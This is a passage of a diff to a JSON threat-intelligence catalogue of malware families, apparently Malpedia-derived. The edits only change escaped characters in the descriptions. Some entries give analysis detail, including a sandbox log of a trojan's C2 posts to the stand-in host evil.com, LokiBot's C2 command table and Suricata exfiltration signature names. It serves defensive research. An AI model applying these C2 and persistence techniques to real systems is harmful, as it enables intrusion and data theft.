organizations linked with Pyeongchang Winter Olympics 2018. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.\r\n\r\nThe malware was capable of a basic reconnaissance, data exfiltration and downloading of additional components from its C&C server. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", @@ -27964,7 +27964,7 @@ "value": "GraphicalNeutrino" }, { - "description": "According to Symantec, Graphican is an evolution of the known APT15 backdoor Ketrican, which itself was based on a previous malware - BS2005 - also used by APT15. Graphican has the same basic functionality as Ketrican, with the difference between them being Graphican\u2019s use of the Microsoft Graph API and OneDrive to obtain its command-and-control (C&C) infrastructure.", + "description": "According to Symantec, Graphican is an evolution of the known APT15 backdoor Ketrican, which itself was based on a previous malware - BS2005 - also used by APT15. Graphican has the same basic functionality as Ketrican, with the difference between them being Graphican’s use of the Microsoft Graph API and OneDrive to obtain its command-and-control (C&C) infrastructure.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphican", @@ -28043,7 +28043,7 @@ "value": "GraphSteel" }, { - "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card\u2019s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", + "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", @@ -29787,7 +29787,7 @@ "value": "Icarus" }, { - "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If \u201c/i\u201d is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If \u201c/I\u201d is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", + "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", @@ -30026,7 +30026,7 @@ "value": "win.icexloader" }, { - "description": "The ICE IX bot is a banking trojan derived of the Zeus botnet because it uses significant parts of Zeus\u2019s source code. ICE IX communicates using the HTTP protocol, so it can be considered to be a third-generation botnet. While it has been used for a variety of purposes, a primary threat of ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, execution of the bot results in establishing a master-slave relationship between the botmaster and the compromised computer.", + "description": "The ICE IX bot is a banking trojan derived of the Zeus botnet because it uses significant parts of Zeus’s source code. ICE IX communicates using the HTTP protocol, so it can be considered to be a third-generation botnet. While it has been used for a variety of purposes, a primary threat of ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, execution of the bot results in establishing a master-slave relationship between the botmaster and the compromised computer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix", @@ -30087,7 +30087,7 @@ "value": "IcyHeart" }, { - "description": "According to Rapid7, this is a loader first spotted in July 2023. It implements several evasion techniques including Process Doppelg\u00e4nging, DLL Search Order Hijacking, and Heaven's Gate. IDAT loader got its name as the threat actor stores the malicious payload in the IDAT chunk of PNG file format.", + "description": "According to Rapid7, this is a loader first spotted in July 2023. It implements several evasion techniques including Process Doppelgänging, DLL Search Order Hijacking, and Heaven's Gate. IDAT loader got its name as the threat actor stores the malicious payload in the IDAT chunk of PNG file format.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.idat_loader", @@ -30248,7 +30248,7 @@ "value": "Industrial Spy" }, { - "description": "Industroyer is a malware framework considered to have been used in the cyberattack on Ukraine\u2019s power grid on December 17, 2016. The attack cut a fifth of Kiev, the capital, off power for one hour. It is the first ever known malware specifically designed to attack electrical grids.", + "description": "Industroyer is a malware framework considered to have been used in the cyberattack on Ukraine’s power grid on December 17, 2016. The attack cut a fifth of Kiev, the capital, off power for one hour. It is the first ever known malware specifically designed to attack electrical grids.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer", @@ -30480,7 +30480,7 @@ "value": "Ironcat" }, { - "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user\u2019s Startup folder.", + "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user’s Startup folder.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo", @@ -30509,7 +30509,7 @@ "value": "IronNetInjector" }, { - "description": "According to Recorded Future, IsaacWiper is a destructive malware that overwrites all physical disks and logical volumes on a victim\u2019s machine.", + "description": "According to Recorded Future, IsaacWiper is a destructive malware that overwrites all physical disks and logical volumes on a victim’s machine.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isaacwiper", @@ -30877,7 +30877,7 @@ "value": "Janeleiro" }, { - "description": "Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to \u201charvest\u201d the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.", + "description": "Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to “harvest” the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jason", @@ -30936,7 +30936,7 @@ "value": "Jeno" }, { - "description": "JessieConTea is a remote access trojan that uses HTTP(S) for communication. It supports around 30 commands that include operations on the victim\u2019s filesystem, basic process management, file exfiltration (both plain and zipped), and the download and execution of additional tools from the attacker\u2019s arsenal. The commands are indexed by 32-bit integers, starting with the value 0x60D49D97.\r\n\r\nThe malware was delivered in-the-wild via trojanized applications like DeFi Wallet or Citrix Workspace.\r\n\r\nJessieConTea generates POST parameters with a specific parameter name, jsessid, from which the initial part of its name is derived. Also, it contains a specific RTTI symbol \".?AVCHttpConn@@\", which inspired the second part of the name. It uses RC4 for C&C traffic encryption.\r\n", + "description": "JessieConTea is a remote access trojan that uses HTTP(S) for communication. It supports around 30 commands that include operations on the victim’s filesystem, basic process management, file exfiltration (both plain and zipped), and the download and execution of additional tools from the attacker’s arsenal. The commands are indexed by 32-bit integers, starting with the value 0x60D49D97.\r\n\r\nThe malware was delivered in-the-wild via trojanized applications like DeFi Wallet or Citrix Workspace.\r\n\r\nJessieConTea generates POST parameters with a specific parameter name, jsessid, from which the initial part of its name is derived. Also, it contains a specific RTTI symbol \".?AVCHttpConn@@\", which inspired the second part of the name. It uses RC4 for C&C traffic encryption.\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jessiecontea", @@ -31584,7 +31584,7 @@ "value": "Khonsari" }, { - "description": "According to Unit42, KHRAT is a Trojan that registers victims using their infected machine\u2019s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.", + "description": "According to Unit42, KHRAT is a Trojan that registers victims using their infected machine’s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat", @@ -31631,7 +31631,7 @@ "value": "KillAV" }, { - "description": "KillDisk is a generic detection name used by ESET to refer to destructive malware with disk wiping capabilities, such as damaging boot sectors and overwriting then deleting (system) files, followed by a reboot to render the machine unusable. Although all KillDisk malware has similar functionality, as a generic detection, individual samples do not necessarily have strong code similarities or relationships. Such generic malware detections usually have many \u201csub-families\u201d, distinguished by the detection suffix (e.g. KillDisk.NBO, KillDisk.NCV, and KillDisk.NCX). Sub-family variants that do have strong code similarities, are sometimes seen in separate cyberattacks and thus can help researchers make connections between them. ", + "description": "KillDisk is a generic detection name used by ESET to refer to destructive malware with disk wiping capabilities, such as damaging boot sectors and overwriting then deleting (system) files, followed by a reboot to render the machine unusable. Although all KillDisk malware has similar functionality, as a generic detection, individual samples do not necessarily have strong code similarities or relationships. Such generic malware detections usually have many “sub-families”, distinguished by the detection suffix (e.g. KillDisk.NBO, KillDisk.NCV, and KillDisk.NCX). Sub-family variants that do have strong code similarities, are sometimes seen in separate cyberattacks and thus can help researchers make connections between them. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk", @@ -32320,7 +32320,7 @@ "value": "LaplasClipper" }, { - "description": "FireEye describes this malware as a highly obfuscated bot that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.\r\n\r\nUsing Dynamic Threat Intelligence, they have observed multiple campaigns targeting multiple industries in the United States, United Kingdom, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland \u2013 primarily in the financial services and insurance sectors. Although the infection strategy is not new, the final payload dropped \u2013 which they named LATENTBOT \u2013 caught attention since it implements several layers of obfuscation, a unique exfiltration mechanism, and has been very successful at infecting multiple organizations.", + "description": "FireEye describes this malware as a highly obfuscated bot that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.\r\n\r\nUsing Dynamic Threat Intelligence, they have observed multiple campaigns targeting multiple industries in the United States, United Kingdom, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland – primarily in the financial services and insurance sectors. Although the infection strategy is not new, the final payload dropped – which they named LATENTBOT – caught attention since it implements several layers of obfuscation, a unique exfiltration mechanism, and has been very successful at infecting multiple organizations.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot", @@ -32618,7 +32618,7 @@ "value": "LightNeuron" }, { - "description": "Lightning stealer can target 30+ Firefox and Chromium-based browsers and steal crypto wallets, Telegram data, Discord tokens, and Steam user\u2019s data. Unlike other info stealers, Lightning Stealer stores all the stolen data in the JSON format for exfiltration. ", + "description": "Lightning stealer can target 30+ Firefox and Chromium-based browsers and steal crypto wallets, Telegram data, Discord tokens, and Steam user’s data. Unlike other info stealers, Lightning Stealer stores all the stolen data in the JSON format for exfiltration. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightning_stealer", @@ -33111,7 +33111,7 @@ "value": "LockPOS" }, { - "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as \u201cTrojan.Nymeria\u201d, although the connection is not well-documented.", + "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda", @@ -33236,7 +33236,7 @@ "value": "LokiLocker" }, { - "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of \u2018-u\u2019 that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: \u201cB7E1C2CC98066B250DDB2123\u201c.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: \u201c%APPDATA%\\ C98066\\\u201d.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: \u201c.exe,\u201d \u201c.lck,\u201d \u201c.hdb\u201d and \u201c.kdb.\u201d They will be named after characters 13 thru 18 of the Mutex. For example: \u201c6B250D.\u201d Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically \u201cckav.ru\u201d. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot\u2019s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", + "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", @@ -33353,7 +33353,7 @@ "value": "LONGWATCH" }, { - "description": "LooChiper is a Ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thank to the term \u201cCipher\u201d) and to the popular mythological figure, Lucifer. Despite its evocative nickname, the functionalities of this malware are pretty straight forward, not very different from those belonging to many other ransomware families. ", + "description": "LooChiper is a Ransomware. It uses a nice but scary name: LooCipher. The name is at the same time an allusion to its capabilities (thank to the term “Cipher”) and to the popular mythological figure, Lucifer. Despite its evocative nickname, the functionalities of this malware are pretty straight forward, not very different from those belonging to many other ransomware families. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.loochiper" @@ -33520,7 +33520,7 @@ "value": "lsassDumper" }, { - "description": "According to PCrisk, Lu0bot es un software malicioso. El malware es ligero, por lo que su uso de los recursos del sistema es bajo. Esto complica la detecci\u00f3n de Lu0bot, ya que no causa s\u00edntomas significativos, como una grave disminuci\u00f3n del rendimiento del sistema.\r\n\r\nEl programa malicioso funciona como un recolector de telemetr\u00eda. ", + "description": "According to PCrisk, Lu0bot es un software malicioso. El malware es ligero, por lo que su uso de los recursos del sistema es bajo. Esto complica la detección de Lu0bot, ya que no causa síntomas significativos, como una grave disminución del rendimiento del sistema.\r\n\r\nEl programa malicioso funciona como un recolector de telemetría. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lu0bot", @@ -33749,7 +33749,7 @@ "value": "Macaw" }, { - "description": "According to ESET, Machete\u2019s dropper is a RAR SFX executable. Three py2exe components are dropped: GoogleCrash.exe, Chrome.exe and GoogleUpdate.exe. A single configuration file, jer.dll, is dropped, and it contains base64\u2011encoded text that corresponds to AES\u2011encrypted strings.\r\nGoogleCrash.exe is the main component of the malware. It schedules execution of the other two components and creates Windows Task Scheduler tasks to achieve persistence.\r\nRegarding the geolocation of victims, Chrome.exe 